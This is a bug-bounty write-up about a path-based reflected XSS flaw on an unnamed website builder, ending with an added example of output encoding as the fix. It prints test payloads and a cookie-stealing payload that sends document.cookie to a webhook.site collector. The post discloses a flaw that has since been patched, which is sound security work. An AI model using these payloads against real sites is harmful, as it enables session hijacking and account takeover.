A Tale of Reflected XSS Affecting Entire Web application

Chirag Agrawal
Published in Techiepedia · 4 min read · Apr 15, 2021

Hello Infosec Community,

Hope Everyone is Safe & Doing Well in this pandemic period.

WHOAMI !

I am Chirag Agrawal (a.k.a. R@iders), a part-time security researcher. I have been researching, practicing and learning for a long time now, and I have been doing bug bounties for six months. Like every bug hunter, I began my journey by reading security write-ups, books and HackerOne reports, and by solving labs.

LET'S UNDERSTAND WHAT'S REFLECTED XSS FIRST!

It basically happens when a user's request is not sanitized properly and the application places the user's input inside the page's code. The attacker injects test input and sees where it is reflected in the response to that single HTTP request. Once he understands the context, he tries to break out of the surrounding code and build a payload that executes scripts he controls. This is highly dangerous, as an attacker can obtain the user's cookies and get a valid session on the user's behalf (unauthorized access).

When a web application is vulnerable to this type of attack, it passes unvalidated input sent through requests back to the client. The common steps of such an attack are:

  1. The attacker tests different URIs and parameters and builds an exploit.
  2. He then convinces his victims to load this URI in their browsers.
  3. As soon as the victim clicks on the link, the exploit code executes in the victim's browser and the attacker receives the victim's cookies on a server he controls.
  4. The attacker then replaces his own cookies with those and gets access to the victim's account.

Example of cookie-stealing exploitation:

To receive the cookies of the person who clicks on the link, you need a domain that you control and whose logs and incoming HTTP requests you can access. For the sake of proof we can use webhook.site as our domain: it acts as our controlled server, and we can put it inside the request so that we get the cookie once someone visits.

Final Payload will look like:

"><script>alert('<img src="https://webhook.site/abcded-asa-daasasada-asdaad-adad?c='+document.cookie+' "/>');</script> //

LET'S ROLL!

I can't disclose the company name due to policies, so let's call it "redacted.com".

It was like a normal website; the main functionality was "website building".

First I added the website to scope and configured Burp Suite. After that I manually browsed the site, searching for possible reflection of user input.

After many attempts, it turned out that everything was getting encoded and sanitized properly when a user entered something.

After some research, I noticed that the website has several directories for different things; when we request a particular directory, it opens. As it was a directory, it didn't have any parameters, so after some testing I thought, let's try to break out directly from the current directory in the URL and try URL-based reflected XSS.

So I then inserted the payloads:

"><script>alert(document.cookie);</script> //

';</script><script>prompt(1);</script>;//

& I got the XSS pop-up :)

Hence, any path/directory was vulnerable to this. I tested different directories as well, and they were all vulnerable too :)

Final URI:

www.redacted.com/PATH/"><script>alert(document.cookie);</script>//
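The root cause and its fix, as an added example that is not part of the original write-up or the vendor's code: a request path reflected into the page without output encoding, next to a version that encodes for each context. The two reflection contexts (an attribute and an inline script string) are an assumption suggested by the two test strings above; the function names and page template are hypothetical.

```javascript
// Added illustration: the request path reflected into two contexts.
// renderVulnerable/renderSafe and the page template are hypothetical.

// Vulnerable: the decoded path is concatenated into the markup as-is.
function renderVulnerable(rawPath) {
  const path = decodeURIComponent(rawPath);
  return '<a href="' + path + '">permalink</a>' +
         "<script>var page = '" + path + "';</script>";
}

// HTML attribute/text context: encode the five significant characters.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Inline-script context: JSON.stringify quotes the value, then escape
// the characters that could close the <script> element or break lines.
function escapeJsString(s) {
  return JSON.stringify(s).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSafe(rawPath) {
  let path;
  try { path = decodeURIComponent(rawPath); } catch (e) { path = '/'; } // malformed %-escape
  return '<a href="' + escapeHtml(path) + '">permalink</a>' +
         '<script>var page = ' + escapeJsString(path) + ';</script>';
}

// Constructed sample inputs, modelled on the two strings in the write-up.
const samples = [
  '/PATH/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E//',
  "/PATH/';%3C/script%3E%3Cscript%3Eprompt(1);%3C/script%3E;//",
];

// Counts <script> openers in the markup: the template itself has exactly one.
function scriptTags(html) {
  return (html.match(/<script/gi) || []).length;
}

for (const s of samples) {
  console.log(scriptTags(renderVulnerable(s)), scriptTags(renderSafe(s)));
}
```

Any count above one means the input created a script element of its own, which makes `scriptTags` usable as a regression check once the encoding is in place.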

IMPACT:

The impact ranges from hijacking the user's session to, when used in conjunction with a social engineering attack, disclosure of sensitive data, CSRF attacks and other security vulnerabilities.
By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.
If the compromised user has elevated privileges within the application, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable application and compromise all users and their data.

Proof Of Concept :

TIMELINE :

April 14 — Reported & Accepted

April 15 — Confirmation on the Patch & Rewarded me with the Bounty €€€

REFERENCES :

Thanks for your time. Regards Chirag

I believe you got something from it. If you liked it, give me a clap and follow for more updates 😁

So this will be it till next time. I will write more of my findings soon so, stay tuned for my next write-up. See you soon:)

I would like to thank everyone who guided & motivated me on my journey!

Take care, fellow hackers,

Happy Hunting!

Connect with me on:

Linkedin : https://www.linkedin.com/in/chirag-agrawal-770488144/

Twitter : https://twitter.com/ChiragA15977205
